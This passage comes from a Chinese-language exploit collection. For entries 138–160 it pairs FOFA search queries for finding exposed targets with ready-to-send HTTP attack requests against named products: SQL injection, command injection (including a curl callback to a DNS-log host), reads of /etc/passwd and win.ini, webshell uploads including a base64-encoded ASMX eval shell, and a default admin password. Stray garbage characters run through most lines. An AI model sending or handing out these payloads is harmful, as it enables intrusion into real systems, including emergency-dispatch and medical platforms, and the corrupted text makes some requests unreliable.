Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj0 Z5 ^) t& S$ w0 P( ]; F: S
Upgrade-Insecure-Requests: 15 U  E) D  D6 c( l. r

, O5 ?8 O: X/ @( e8 i% d0 ~% i# U# i  e* R  [
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
3 l! T1 ~3 {1 B, J6 h" mCVE-2024-2621
( S3 R! r! t; T9 G2 ~- bFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
8 g. N6 Z( O  N3 q- XGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
+ ^/ _$ m  o$ r7 z8 Y: f; @Host: x.x.x.x: n& K! H$ H/ V5 W: ^; X8 ^9 L" o! c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
  J7 m# @/ H; @& M  i) M7 F- @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 [( y3 W" V, b8 i2 H. G: }) dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. {  w' P4 h  m- EAccept-Encoding: gzip, deflate, br
/ @2 g0 d, X( G6 G( h3 EConnection: close! A$ f+ S9 k% ^) @+ U" Z$ R! d$ F1 \
Upgrade-Insecure-Requests: 1* M- Y0 |* x6 g5 w2 I# D/ A
" X2 m8 X% `( i& n! \) ?3 E
0 g7 t: e  w. ~: ~
139. 福建科立讯通信指挥调度平台editemedia.php sql注入0 e9 t( H% g* C; D1 |; Z& L! I
CVE-2024-26226 O0 [5 T) X* D' B' G- G
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"# a0 D0 O9 L& `7 ~% I- }/ M! p5 K
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1: E4 r, _7 T+ A. m! g/ O
Host: x.x.x.x
! `5 T* ~; f  ?! t8 v. f- W) R. YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
7 U" u0 ~% v: w: L' q5 X" UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, }+ |/ @6 X0 J2 K5 Q( gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 J% u: Y0 k3 ?0 O$ }+ R) z7 n7 CAccept-Encoding: gzip, deflate, br+ G' W3 ]* V1 ~. W7 r) c1 [
Connection: close, I9 x; d! e& H: c- y
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk  l* r3 \1 }' P- n  t/ y) J# x
Upgrade-Insecure-Requests: 1
) R. `% B& C  m( a& B- V5 k3 _8 J4 w: A8 e5 p  g& E
/ w8 k1 `! A& {4 \# P' V
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
* t) `3 t: m# w+ p! e9 K: H3 `CVE-2024-2566
  W  A3 |( p8 X* x) IFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
6 E: g( n% ~3 q0 pGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
2 _) N  G! I0 I6 o/ _; THost: x.x.x.x
! e6 ?9 J& ~8 e% v  e8 S6 p! ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
) {& H& N; i" y1 V- O( p) c$ JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 c/ y) p6 W) p, TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" e0 L  I0 q8 |Accept-Encoding: gzip, deflate, br
, Z7 E  t4 \9 f$ v, s  TConnection: close- A' e5 |" a4 y3 e6 \( O! u0 {* `5 G; U
Cookie: authcode=h8g9/ X1 \3 Z- A( P+ E8 ?6 K% I7 P
Upgrade-Insecure-Requests: 15 h4 O2 K" I. _/ f# J6 e
/ b, G* V& o; E" p3 P' A- e0 z
+ }  `1 Y, X/ Q/ N* p1 k/ h
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入5 e, j$ [3 f3 c
FOFA:body="指挥调度管理平台"
1 P  q  a# y% l9 z7 h' [POST /app/ext/ajax_users.php HTTP/1.1
  V* H& s+ l  ^2 U7 R; oHost: your-ip
% r8 J/ Y: _. ?User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
4 H! I  [3 f2 O. ]- P" @+ Y" IContent-Type: application/x-www-form-urlencoded
* T+ w; P0 q% [( B' [) u/ ~: G9 U: Y+ t& k+ ^$ J# N
" Z" l  Y3 W- |$ b- r7 s" v
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -! B' p/ c7 o6 d4 X
! r* E6 K2 x3 ^. q
- M& o; K% w4 K6 a% k
142. CMSV6车辆监控平台系统中存在弱密码  f0 G  f  x# c( i; m# _+ y
CVE-2024-29666& \, N+ E' b3 E6 ?; D: R
FOFA:body="/808gps/"$ @+ R8 Q$ Q3 v8 P! M1 w
admin/admin7 I' z5 Y7 Y; b$ |" d) L
143. Netis WF2780 v2.1.40144 远程命令执行6 w; o: ^4 @$ o
CVE-2024-25850
) p8 n$ s6 y1 C" |1 J6 l% U9 PFOFA:title='AP setup' && header='netis'7 \3 Y1 P5 G; V) ~; G
PAYLOAD
4 |- F0 V& a1 v# H( ~# T$ L- {7 r: O7 j5 w( `9 _; w
144. D-Link nas_sharing.cgi 命令注入2 \' M) P) m0 v( o0 d9 q" d. ~  R" k
FOFA:app="D_Link-DNS-ShareCenter"
# U) b1 i, f3 c3 Ksystem参数用于传要执行的命令& {& n! M* s, [. L' _; u
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
2 k9 y. ^6 l0 T$ G' b+ y- yHost: x.x.x.x7 {9 ~& D- ?3 x7 g& A. Q3 q( C/ L
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
8 R" i" Y9 D2 A% X! hConnection: close
. g$ w4 e$ s" d0 |' _Accept: */*
7 g. }/ K) c1 q, b1 LAccept-Language: en
/ g  ?9 M$ p- G5 gAccept-Encoding: gzip% G0 _3 |; X# ^5 X8 w  k/ \
' S4 U9 n  Y$ w# v( O
$ G/ ?# D. C# r# h2 V* E
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
; }+ q$ S5 ]4 m# G8 M9 M: {4 xCVE-2024-3400
1 E( e8 J1 c; s& {* q& oFOFA:icon_hash="-631559155"
6 j5 c4 O! H) R/ E3 ?GET /global-protect/login.esp HTTP/1.1
! Z, x' n6 ?; f# p0 xHost: 192.168.30.112:1005
2 ^# B2 y9 {! J3 g3 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84* a6 o* H+ L$ S% U5 n: Z5 X6 \
Connection: close8 e$ `& ?! N+ m/ Q  v6 }6 S4 p. D) `
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;5 m( r. X! _, q# J2 d# b' k4 H: k8 i4 x
Accept-Encoding: gzip
$ P* p, e$ s# }$ z1 a
  m6 f1 N& i# R: x
2 v" Z+ b4 d# h7 j: y146. MajorDoMo thumb.php 未授权远程代码执行/ f' E) l  C& g# ]  R) Z( B; S
CNVD-2024-02175
) c8 k* A! z; ]. e: tFOFA:app="MajordomoSL"
; \! S& z5 n# M9 ]* H$ mGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
/ z9 i9 J+ {& g" Y& r0 `, WHost: x.x.x.x
1 Y' Q. ?- q3 W; V8 t, ]- b: xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84' R  o) k# J( ^: U7 ]
Accept-Charset: utf-84 _  }9 l, {/ B$ n- ?5 Y2 ~3 c
Accept-Encoding: gzip, deflate1 s& Y7 o# f/ {% y( b! L. O. j
Connection: close
" Z, I1 k6 u- D/ Y1 X- F1 q  l  ?# T- P  v, M
6 a0 \6 ~# W  P/ L. L
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历8 C, f3 _7 W6 U0 J$ A* A* h
CVE-2024-32399
$ s7 U8 e6 |1 o: DFOFA:body="RaidenMAILD"
2 \& G) y0 o. z  u( ], WGET /webeditor/../../../windows/win.ini HTTP/1.1" V( O$ @) J1 f/ L9 s' s
Host: 127.0.0.1:81: a. r* _. t- }0 d" |" d+ W
Cache-Control: max-age=0" X$ e3 Q% M7 _+ T* V/ g& O
Connection: close0 Z8 |+ b$ S! b# t% m, h
% d6 M' j9 P% q2 W5 p
' w/ B* h  P. Q
148. CrushFTP 认证绕过模板注入0 l# H' S* @, v: ?
CVE-2024-4040
! {2 ], o) [- a; ?; X% i2 kFOFA:body="CrushFTP"
" R5 M3 ~6 ?& n9 B' }: H, g7 [PAYLOAD* O  I+ g. L. h. u! `, W
4 U- o) [/ Q0 h) c
149. AJ-Report开源数据大屏存在远程命令执行: _9 C( C0 j7 g/ B5 B
FOFA:title="AJ-Report"  l5 ]: G9 ?# G$ K/ |. o+ q

! |( b4 ~% S& d" CPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
3 l2 b% t! l8 @- |$ A+ fHost: x.x.x.x
* E6 X! w1 W8 t2 M# P+ G4 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 ~4 }& A' k6 S5 T9 c4 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  G- K8 A8 B# R, O3 y! FAccept-Encoding: gzip, deflate, br0 ~4 U$ H3 Z" a/ }' v6 B0 S- ]0 p
Accept-Language: zh-CN,zh;q=0.9
' P- f6 G7 A* Y7 D+ N5 QContent-Type: application/json;charset=UTF-8
7 M  Y3 O$ n% zConnection: close
( S( h" N+ G) ^1 R8 ]3 ]( m9 G
, |+ w& w1 }* }) V  K{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}7 Z& Y+ r0 Z& `  b  z+ J, P
8 j0 l' j8 p" U8 c) E3 T0 m
150. AJ-Report 1.4.0 认证绕过与远程代码执行
; b& o  \8 C- e' ~FOFA:title="AJ-Report"
' Q$ Y) A% t( y! M: ]; \POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
8 H; a  Q9 j5 w. `Host: x.x.x.x4 q7 Q6 W: U# ~/ g- @3 ]4 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 e5 ?9 a+ y( o: z# b1 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; G5 j8 B( V: P3 g6 GAccept-Encoding: gzip, deflate, br8 y9 y( J* Y  ~$ D- R. D  |0 n3 n
Accept-Language: zh-CN,zh;q=0.9
, d$ d. t3 g7 hContent-Type: application/json;charset=UTF-82 M0 n) `3 R# R, v
Connection: close
5 m6 l$ x/ @" \* e9 l; b5 |Content-Length: 3390 ]+ n* z: p5 W. N) y2 S
8 V* q2 v$ }% m: Y
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
$ j( s8 P* _  q8 T0 P/ d* B6 l/ s- B/ \, a" J6 N9 w
3 B# i4 H6 @7 W- N
151. AJ-Report 1.4.1 pageList sql注入
) d) A/ V0 W6 |' JFOFA:title="AJ-Report"
4 R! R- S6 _* @% p2 S  M8 `2 fGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.15 |+ c6 M( P( Z4 P
Host: x.x.x.x% G/ r. Y$ _+ V' S! n" B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% U& M, B0 m" u5 m; t
Connection: close: t1 p+ H) k' I" s8 H  P
Accept-Encoding: gzip, |, U' y$ A# W( k) \% E9 b; ?# o( N7 m5 s

# i8 G  x# f$ ?( X8 E
# D; y6 ~) x4 ]) b* q8 B5 @152. Progress Kemp LoadMaster 远程命令执行0 c' b# [! f. c$ E5 x% C1 B1 i: f8 `
CVE-2024-12128 ]% J  P/ \' l% B' D5 w
LoadMaster <= 7.2.59.2 (GA)" {) j; K" U8 z3 I9 _/ q/ p' e
LoadMaster<=7.2.54.8 (LTSF)% d+ n& V# h* W8 J+ J+ Q
LoadMaster <= 7.2.48.10 (LTS)
; \# w  @! ?3 cFOFA:body="LoadMaster"
, w% P0 {( |5 \2 T0 w% JJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
( Y) F7 q$ W+ K/ t) v  LGET /access/set?param=enableapi&value=1 HTTP/1.1
0 \( L) X% Q% ^. R* _/ c. }  sHost: x.x.x.x
$ e( X! u' {% [( y4 U- s4 u) R" ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
% X% n. b1 h. P. W7 v- p) q1 C$ ^Connection: close
9 k# T, }: X3 k5 d* I7 BAccept: */*2 ?! R/ a: w0 f0 P  r% `' A7 F
Accept-Language: en
2 J0 K2 }: P& _, i  KAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
3 u# {3 _  X' w! _0 I+ qAccept-Encoding: gzip
" y+ M0 H& J+ v3 L8 X9 \) R( E
% m4 f" @# d" N0 h/ W, O( i' [# X+ Y4 n
153. gradio任意文件读取& q7 F! ?# ]$ N( G- I
CVE-2024-1561FOFA:body="__gradio_mode__". \. y# Y7 v. [. u: c7 K" g
第一步,请求/config文件获取componets的id0 R1 t0 k3 B4 y+ ?- ?+ `/ u
http://x.x.x.x/config6 H9 n( Z' N$ U" h% C8 c

, s" z" P0 B* b
3 m7 E; C( ?2 \" M, H) b第二步,将/etc/passwd的内容写入到一个临时文件
: ]7 l6 t  A  w+ kPOST /component_server HTTP/1.1% [" Z& s) l* N) ~
Host: x.x.x.x5 r/ l- z1 R$ {: V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3! k4 i3 Z. t  }: j
Connection: close/ A8 h: V- M4 |* ]
Content-Length: 115
) G( Z( p: f9 e( a, p  qContent-Type: application/json
, g% S% L' j* EAccept-Encoding: gzip
. W  V$ C# r  p1 n' |. N9 m0 l( a2 b. B5 u1 l
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}/ O' g2 m! ]/ ~2 W
7 C7 Z; g6 x4 M& }' V( D" k5 `
* U0 P) ~, c1 B
第三步访问7 s; E7 {# |; B# w8 W! X
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
9 L3 l( v. d; _9 Z2 D# ?9 L0 A' d/ n7 o. S7 z

5 }* n1 [1 h! x0 Q5 y/ `& a154. 天维尔消防救援作战调度平台 SQL注入
% f  {! }- n* _8 G9 TCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"5 ~9 \2 C8 x- v9 w3 N5 v0 v8 v
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
/ `: }7 A, U& o9 s; m2 {Host: x.x.x.x
" P3 q) s) A+ uContent-Length: 1064 T/ u1 R$ q9 D+ W
Cache-Control: max-age=02 A+ Y! i$ j3 k0 Y9 r$ `
Upgrade-Insecure-Requests: 1. U5 i, q3 f1 k5 O* e3 C8 s
Origin: http://x.x.x.x: Z, {$ Z/ q1 }* U3 }. D" |
Content-Type: application/json* q& W% W" M8 _, {) f- {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
5 }: L; |! K7 \/ wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 n/ N% p8 Z: J# h8 Z( A# v7 r1 W1 ~% ^Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page3 L/ u' h8 ~9 s0 }6 V! h+ g$ O1 |
Accept-Encoding: gzip, deflate5 c3 d% z( t6 \, e2 Y2 O7 r( d/ i
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
1 q# b6 b) B% i, i' W- c: f1 jConnection: close
! X0 q  W& \. M5 ?8 c$ _* `! j4 q
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}+ S+ ?3 K* Q' E5 x2 g, I# t' i
: v  U! ?$ i& o! r5 `! v

9 c0 {2 v' ?* p155. 六零导航页 file.php 任意文件上传
- {+ z! y! o: N: XCVE-2024-349825 M* ^/ U5 H! L  i( D1 {
FOFA:title=="上网导航 - LyLme Spage"( [% y! n" z$ A7 v# }0 A% c1 F1 n
POST /include/file.php HTTP/1.1" q3 |9 V: ~3 r# U! q  N5 @
Host: x.x.x.x
# B9 Y- d) d0 I4 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0& v1 `6 t0 U% T& V/ W" |2 Q! M4 |
Connection: close
% c# O: Z7 [& A' c8 ^" y, M* nContent-Length: 2326 u9 a' e; {& s2 j9 D
Accept: application/json, text/javascript, */*; q=0.01- Y0 y/ {9 {. ]) Q! ]4 s" y
Accept-Encoding: gzip, deflate, br9 h' E0 {" N  a9 y; {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" Y/ L0 P4 }: l4 HContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f; g3 |. M7 U) N3 F. [
X-Requested-With: XMLHttpRequest
+ G. e$ D& b3 L! y
( I3 s- z4 Z0 b( G1 v( ^-----------------------------qttl7vemrsold314zg0f7 z. F$ k' t- c. X! h& V0 @0 R; r7 j
Content-Disposition: form-data; name="file"; filename="test.php"5 j% p! G: \  w
Content-Type: image/png
# E- ~/ R- U+ M# ^% t8 Y
0 a" L5 r+ C/ ]9 h<?php phpinfo();unlink(__FILE__);?>; [* N' I7 C( v# ~4 k0 W
-----------------------------qttl7vemrsold314zg0f--
1 B9 C1 N/ A; H
& X( R& k6 H4 C- \3 O5 d: B* `3 f( B0 Z0 K  ^% D
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php# X4 X- U6 a' n" F. p1 V) _! F

2 B; L5 X6 G; k1 k# @3 }# g156. TBK DVR-4104/DVR-4216 操作系统命令注入
/ P" j) F( K" V0 @CVE-2024-3721, F. T' a$ A+ I# g+ Z* _- O
FOFA:"Location: /login.rsp"
3 U: E! Y& C# [1 h·TBK DVR-4104
& q& C( z9 w6 a- \0 r·TBK DVR-4216
. `& C8 d8 ^+ Wcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"2 o, \) w2 j& Q# F% x* ]/ t0 |

& k/ v( ?1 t" f, A1 S0 j: r' _8 L* ]0 }
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
& t9 C. P+ m) VHost: x.x.x.x
+ H; y/ y; Z6 N7 Q$ L1 }0 ?, T& EUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 q0 k" a, f& K9 m( uConnection: close2 t9 I, \; B' |- |- ~1 Z
Content-Length: 0
8 r; w0 C; N) O5 u! j, k; M; HCookie: uid=1: J" g4 U# N& l
Accept-Encoding: gzip' L5 H$ ^$ Y2 A# B  u" _5 _+ J
7 L, x4 r. y7 d( M& t4 c5 u3 p& d) n6 ~

' c8 L& A! w- W: t: `0 @6 S157. 美特CRM upload.jsp 任意文件上传
8 B) G/ p; S; g& i& ^- ^9 R! N( T. pCNVD-2023-06971
$ ^& F! L/ R( w8 b1 Z; M; H3 sFOFA:body="/common/scripts/basic.js"
' l" |0 l1 R8 ^$ w3 p; o& w4 XPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
  G7 t  c- Q- f' L5 Y4 ?+ ]% gHost: x.x.x.x. f$ I% q: f' Y! ~  t2 x2 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36+ W' c6 R5 Z/ L% u
Content-Length: 709; p5 i, ^3 X1 C. T5 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) e1 d9 T+ J' k" r: ?+ ~: K
Accept-Encoding: gzip, deflate7 I1 s3 q! q3 ^
Accept-Language: zh-CN,zh;q=0.9
' x; @! c& l6 z- b7 ]+ cCache-Control: max-age=0
2 T9 Z& c4 o% yConnection: close0 ?, E( z9 ]+ ?% r& a0 ]4 Y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
0 q/ A+ W( v& b3 b0 lUpgrade-Insecure-Requests: 15 y, l* x8 J$ r# O8 b# J

$ Z4 w( M2 @! q5 J/ b. U) C------WebKitFormBoundary1imovELzPsfzp5dN
$ r; H# A2 W. T; Z% Y4 w, N& nContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"+ g; }( \$ \9 P
Content-Type: application/octet-stream$ u7 [! s) x% Z1 r8 W: ^0 @7 n
! S  \. V+ S: J6 l1 @
nyhelxrutzwhrsvsrafb8 p) T0 c( V4 |$ P# ?
------WebKitFormBoundary1imovELzPsfzp5dN
  Z. K  x' w6 Z' k9 _" ?Content-Disposition: form-data; name="key"  {/ f6 o8 d- q) H% @/ i- T& L

( Q4 n* K. A0 Dnull9 }9 f+ `1 S; e9 z2 r' T/ o# A8 n
------WebKitFormBoundary1imovELzPsfzp5dN
9 j7 M& h5 L2 ]Content-Disposition: form-data; name="form"
7 l( E; z: a" y  M! n, v0 q
1 M/ r; T& U5 Enull
$ S" k* C4 z7 X6 ~/ ?3 U------WebKitFormBoundary1imovELzPsfzp5dN
& n7 L% Q0 T' n' }. K9 j9 vContent-Disposition: form-data; name="field"
8 S. u9 m* P  N
5 U  |+ I0 l( _! t8 ?null
7 L7 U4 @7 E- y# r) b( p) L- I% Q* b------WebKitFormBoundary1imovELzPsfzp5dN* b: [5 W5 D) L" _& x: R
Content-Disposition: form-data; name="filetitile"% [* B% B: |$ o* c3 f

0 S+ {8 h1 u( J( q4 `null
; I) n) K  O/ }6 o------WebKitFormBoundary1imovELzPsfzp5dN3 b$ N  O7 m: I; K4 ~
Content-Disposition: form-data; name="filefolder"
* G- \0 g4 D2 k8 J) D7 O6 v+ ]: v6 g- D) }/ l4 K
null
. J2 [3 d/ _, W9 R8 l% W6 B------WebKitFormBoundary1imovELzPsfzp5dN--9 v0 y: l3 f5 i! `
5 @6 A8 h! O" |; H" K0 l% }' ]9 ~& b

) L( v, E6 g  Q& G2 e: a% c6 zhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp. j6 K9 W; S& i/ @( v9 Z5 x) e
9 S, E8 A, k# n
158. Mura-CMS-processAsyncObject存在SQL注入) m$ k5 T( m+ A9 B2 C' V
CVE-2024-32640
' I9 ^6 W& j! }FOFA:"Generator: Masa CMS"
+ N3 I- }# k& T; A2 h& E' r( yPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
: M( F& a2 ^& l) J+ R  ^Host: {{Hostname}}
6 D6 I: t( L: g: k. J9 `4 PContent-Type: application/x-www-form-urlencoded8 ]% x, q% {/ C/ ?& w
# J0 E. t- C+ Y$ w
object=displayregion&contenthistid=x\'&previewid=12 D' @* C' ]- @4 Z% {

3 S6 P5 ?" o% s! y
3 W  g2 J3 I/ u( |6 H. Q* v4 ]159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
. n$ A: j% ?3 o, I. a0 G' e+ @FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
; Y  C: j; i" _6 T6 nPOST /webservices/WebJobUpload.asmx HTTP/1.1. {, T! n7 r0 W  x
Host: x.x.x.x2 s8 O- @* F" A4 f3 x4 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
: Q; W7 I+ `# U( G$ `0 ~Content-Length: 1080
! L: U: u5 @& M) VAccept-Encoding: gzip, deflate
: i9 O( e# `8 a/ gConnection: close9 i; n% C7 q( F6 M3 z0 W
Content-Type: text/xml; charset=utf-8( b$ G- D# J  m/ |
Soapaction: "http://rainier/jobUpload"
! t9 l( H; Z- X) \/ n9 x& x. r6 p' \$ G# P- ~/ _. Z+ J
<?xml version="1.0" encoding="utf-8"?>
0 ]# v: a7 C% A& \<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
- w, X) Z4 U% B& V6 @; Z# `<soap:Body>+ \$ }# `0 E# I- n% m$ h% @4 e! ^
<jobUpload xmlns="http://rainier">
% A3 v1 L- z6 [3 A<vcode>1</vcode>7 B! W+ c# a; G$ j
<subFolder></subFolder>
9 ~# }5 m" `$ d) w<fileName>abcrce.asmx</fileName>* I- y& p4 l& h0 M
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>( L3 O4 ~) N* A4 X: _% `$ y  v
</jobUpload>4 g% u( p# s* ]0 j* O4 S: E; B
</soap:Body>7 Y3 q: d0 k7 ~. G8 r& d' J" Z
</soap:Envelope>, ]$ u3 X8 }! m
4 v' ?/ c7 h: C- c) A0 W

' Q+ ?# A9 _: M/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
* P* H/ L0 w! _+ V1 G; v/ [) Z) ?5 q% b+ H# R+ ~7 ]5 x+ B9 U3 x1 Y- a
) p, E9 ^; N" |% E  ]6 ]$ q4 x; e
160. Sonatype Nexus Repository 3目录遍历与文件读取! ^$ F1 E, L; B9 z8 Q
